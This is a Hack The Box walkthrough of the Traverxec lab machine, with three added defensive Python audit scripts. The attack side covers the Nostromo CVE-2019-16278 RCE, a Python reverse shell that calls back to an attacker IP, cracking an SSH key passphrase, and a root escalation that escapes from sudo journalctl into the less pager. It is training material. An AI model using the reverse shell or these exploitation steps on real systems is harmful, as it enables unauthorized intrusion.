About Hack The Box Pen-testing Labs

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with thousands of people in the security field.

Traverxec is an easy-difficulty machine retiring this week. We gain initial access by exploiting the Nostromo directory traversal / RCE. Enumerating the Nostromo config files, we get to know the home directory of Nostromo, which is running as a privileged user. For root, we exploit the sudo privilege on journalctl.

Enumeration

As usual, let’s start off with a Nmap scan.

Nmap scan report for 10.10.10.165
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nostromo version 1.9.6 is running on the box. A quick Google search shows it's vulnerable to RCE via directory traversal.

Reference: Exploit-DB (www.exploit-db.com), "nostromo 1.9.6 – Remote Code Execution", CVE-2019-16278, remote exploit for multiple platforms.

root@kali:~/htb/boxes/traverxec# python 47837.py -h
[ASCII art banner: CVE-2019-16278]
Usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>

Ok, so this requires three parameters: IP, port and command.

Boom, we have code execution.
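From the defender's side, the request that delivers this kind of traversal / RCE lands in the web server's access log, and the thing to look for is a request path that still contains a `..` segment after every layer of encoding has been undone. The following is an added example (not part of the original writeup, and not the exploit's or Nostromo's code) that decodes each logged path the way a lenient server would and flags traversal attempts; the log lines are constructed samples in Common Log Format, and the IP and timestamps in them are made up.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Common Log Format (not taken from the box);
# lines three to five carry traversal attempts in three different encodings,
# and the last line has a ".." only in the query string, which is harmless.
SAMPLE_LOG = """\
10.10.14.31 - - [10/Mar/2020:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234
10.10.14.31 - - [10/Mar/2020:12:00:02 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225
10.10.14.31 - - [10/Mar/2020:12:00:03 +0000] "GET /../../etc/passwd HTTP/1.1" 404 0
10.10.14.31 - - [10/Mar/2020:12:00:04 +0000] "GET /%2e%2e%2f%2e%2e%2fetc/passwd HTTP/1.1" 200 1500
10.10.14.31 - - [10/Mar/2020:12:00:05 +0000] "GET /%252e%252e/conf/nhttpd.conf HTTP/1.1" 200 700
10.10.14.31 - - [10/Mar/2020:12:00:06 +0000] "GET /~david/public_www/index.html?page=.. HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def normalize_path(target, rounds=3):
    """Reduce a request target to the path a lenient server would resolve."""
    path = target.split('?', 1)[0]            # the query string never selects a file
    for _ in range(rounds):                    # undo double/triple percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop control characters: some servers strip or ignore them when resolving
    # the path, so a check on the raw string would miss what actually gets served.
    path = ''.join(ch for ch in path if ch >= ' ' and ch != '\x7f')
    path = path.replace('\\', '/')
    return re.sub(r'/+', '/', path)


def is_traversal(target):
    """True when the normalised path still contains a parent-directory segment."""
    return '..' in normalize_path(target).split('/')


def scan_log(text):
    """Return (ip, method, target, status) for every traversal attempt in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m['target']):
            hits.append((m['ip'], m['method'], m['target'], int(m['status'])))
    return hits


if __name__ == '__main__':
    for ip, method, target, status in scan_log(SAMPLE_LOG):
        print(f'traversal attempt from {ip}: {method} {target} -> {status}')
```

Attempts answered with a 200 are the ones to escalate, since the server handed something back; a 404 shows the attempt was made but nothing was served. The decoding loop is what makes the double-encoded variant visible, and the query string is cut off first so that `..` in a parameter does not produce a false positive.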

Shell as www-data

Here are the contents of my reverse shell code:

root@kali:~/htb/boxes/traverxec# cat pythonshell.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.31",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Enumerating the filesystem, we find the configuration file nhttpd.conf:

www-data@traverxec:/var/nostromo/conf$ cat nhtt*
MAIN [MANDATORY]

servername      traverxec.htb
serverlisten    *
serveradmin     david@traverxec.htb
serverroot      /var/nostromo
servermimes     conf/mimes
docroot         /var/nostromo/htdocs
docindex        index.html

LOGS [OPTIONAL]

logpid          logs/nhttpd.pid

SETUID [RECOMMENDED]

user            www-data

BASIC AUTHENTICATION [OPTIONAL]

htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd

ALIASES [OPTIONAL]

/icons          /var/nostromo/icons

HOMEDIRS [OPTIONAL]

homedirs        /home
homedirs_public public_www

There are a couple of interesting things here: the username david, the authentication file .htpasswd, and the homedirs option. Going through the documentation to understand the conf file, these are the lines of interest for us:

To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally /home.

The content of the home directory is handled exactly the same way as a directory in your document root.

You can restrict the access within the home directories to a single subdirectory by defining it via the homedirs_public option.
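Read together, those three directives tell a reviewer exactly which filesystem directories the daemon will serve: the document root, every alias, and `<home>/<homedirs_public>` for each user. The following is an added example, written for this writeup and not code from Nostromo or the box, that parses the nhttpd.conf shown above into a dictionary, computes the served directories, and reports the settings a defender would want changed. It assumes the simple `key value` line format seen above; the list of user home directories is passed in (constructed, so the script runs without a real /home), and WEAK_CONF is a hypothetical weaker variant written to show what the checks catch.

```python
import os
import re

# nhttpd.conf as shown in the writeup above (section banners and directives;
# blank lines omitted).
NHTTPD_CONF = """\
MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
LOGS [OPTIONAL]
logpid logs/nhttpd.pid
SETUID [RECOMMENDED]
user www-data
BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
ALIASES [OPTIONAL]
/icons /var/nostromo/icons
HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
"""

# Constructed weaker variant (hypothetical, not from the box): whole home
# directories are served, the password file sits inside the document root,
# and no SETUID user is configured.
WEAK_CONF = """\
MAIN [MANDATORY]
serverroot /var/nostromo
docroot /var/nostromo/htdocs
BASIC AUTHENTICATION [OPTIONAL]
htpasswd /var/nostromo/htdocs/.htpasswd
HOMEDIRS [OPTIONAL]
homedirs /home
"""

SECTION_RE = re.compile(r'^[A-Z ]+\[[A-Z]+\]$')   # e.g. "HOMEDIRS [OPTIONAL]"


def parse_nhttpd_conf(text):
    """Return {directive: value}; alias lines (key starts with '/') go under 'aliases'."""
    conf = {'aliases': {}}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or SECTION_RE.match(line):
            continue
        key, value = line.split(None, 1)
        if key.startswith('/'):
            conf['aliases'][key] = value
        else:
            conf[key] = value
    return conf


def served_directories(conf, user_homes):
    """Filesystem directories the server will hand out over HTTP."""
    roots = [conf['docroot']] + list(conf['aliases'].values())
    if 'homedirs' in conf:
        sub = conf.get('homedirs_public')   # None means the whole home is served
        roots += [os.path.join(h, sub) if sub else h for h in user_homes]
    return roots


def is_under(path, root):
    path, root = os.path.abspath(path), os.path.abspath(root)
    return os.path.commonpath([path, root]) == root


def review(conf, user_homes):
    """Return human-readable findings for settings that widen exposure."""
    findings = []
    roots = served_directories(conf, user_homes)
    if 'homedirs' in conf and 'homedirs_public' not in conf:
        findings.append('homedirs set without homedirs_public: entire home directories are served')
    htpasswd = conf.get('htpasswd')
    if htpasswd and any(is_under(htpasswd, r) for r in roots):
        findings.append(f'htpasswd file {htpasswd} lies inside a served directory')
    if conf.get('user') in (None, 'root'):
        findings.append('no SETUID user (or root): the daemon keeps the privileges it started with')
    return findings


if __name__ == '__main__':
    for label, text in (('box config', NHTTPD_CONF), ('weak config', WEAK_CONF)):
        conf = parse_nhttpd_conf(text)
        print(label, 'serves:', served_directories(conf, ['/home/david']))
        print(label, 'findings:', review(conf, ['/home/david']) or 'none')
```

The box's own config produces no findings, which is the point worth noticing: it is not misconfigured, it simply serves `/home/david/public_www` by design, so anything a user drops into that directory is reachable over HTTP, and the `.htaccess` realm seen later is the only thing standing between a request and the protected area.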

The protected-file-area directory looks interesting.

www-data@traverxec:/home/david/public_www/protected-file-area$ cat .htaccess
realm David's Protected File Area. Keep out!

Contents of protected-file-area:

Privesc www-data -> david

Transferring backup-ssh-identity-files.tgz onto our box, we find it contains david's .ssh folder. The private key id_rsa is encrypted with a passphrase. Let's get john to work, and he delivers yet again.

Privesc david -> root

David’s home has a separate bin directory.

server-stats.sh has an interesting sudo command on journalctl.

According to GTFOBins:

journalctl invokes the default pager, which is likely to be less; other functions may apply.

I reduced the size of my terminal so that it invokes less.
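The root cause here is a sudo rule that grants a command which hands control to an interactive pager running as root. The following is an added example (not part of the original writeup, and not the box's actual sudoers file) of a small audit that parses simple sudoers rules and flags grants of journalctl or systemctl without `--no-pager`, as well as grants of programs that are interactive in their own right; for each pager case it prints the equivalent rule with the flag added. The sudoers fragment is constructed: the david line is hypothetical and only mirrors the shape of the grant discussed above, and the unit name nostromo.service is assumed.

```python
import os
import re
import shlex

# Constructed sudoers fragment (hypothetical; not the box's /etc/sudoers).
# The david rule mirrors the shape of the journalctl grant discussed above.
SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
david   ALL=(root) NOPASSWD: /usr/bin/journalctl -n 5 -u nostromo.service
backup  ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n 5 -u nostromo.service
ops     ALL=(root) /bin/systemctl status nostromo, /usr/bin/less /var/log/syslog
"""

# journalctl and systemctl pipe output through a pager (less by default)
# unless --no-pager is given; the second group are interactive programs that
# a sudo grant should never hand out directly.
PAGER_USERS = {'journalctl', 'systemctl'}
INTERACTIVE = {'less', 'more', 'vi', 'vim', 'man'}

RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.+)$'
)
TAG_RE = re.compile(r'^([A-Z]+):\s*')          # NOPASSWD:, SETENV:, ...
SKIP_PREFIXES = ('Defaults', 'Cmnd_Alias', 'User_Alias', 'Host_Alias', 'Runas_Alias', '@')


def parse_rules(text):
    """Flatten 'user host=(runas) TAG: cmd, cmd' lines into one dict per command.
    Only plain user rules are handled; aliases and includes are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m['rest'], []
        while True:
            t = TAG_RE.match(rest)
            if not t:
                break
            tags.append(t.group(1))
            rest = rest[t.end():]
        for cmd in rest.split(','):
            rules.append({'user': m['user'], 'runas': m['runas'] or 'root',
                          'tags': tags, 'cmd': cmd.strip()})
    return rules


def audit(rules):
    """Return (user, cmd, advice) for every grant that reaches a pager or an
    interactive program as the run-as user."""
    findings = []
    for r in rules:
        if r['cmd'] == 'ALL':
            continue
        argv = shlex.split(r['cmd'])
        prog = os.path.basename(argv[0])
        if prog in PAGER_USERS and '--no-pager' not in argv:
            fixed = ' '.join([argv[0], '--no-pager', *argv[1:]])
            findings.append((r['user'], r['cmd'],
                             f'{prog} opens a pager as {r["runas"]}; grant instead: {fixed}'))
        elif prog in INTERACTIVE:
            findings.append((r['user'], r['cmd'],
                             f'{prog} is interactive and runs as {r["runas"]}; grant a non-interactive wrapper instead'))
    return findings


if __name__ == '__main__':
    for user, cmd, advice in audit(parse_rules(SUDOERS)):
        print(f'{user}: {cmd}\n    {advice}')
```

The `backup` rule is the hardened shape: the same journalctl invocation with `--no-pager`, so the output goes straight to the terminal and no pager process ever runs as root. Real sudoers files also use aliases and `@include` directories, which this audit deliberately skips rather than guessing at.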

Final: One thing I liked about this box is that it didn't require running any scripts to find something obscure; all it required was careful enumeration and reading documentation, which I think is a hallmark of any top-notch box.

Credit: Preetham Bomma, Security Researcher – Loginsoft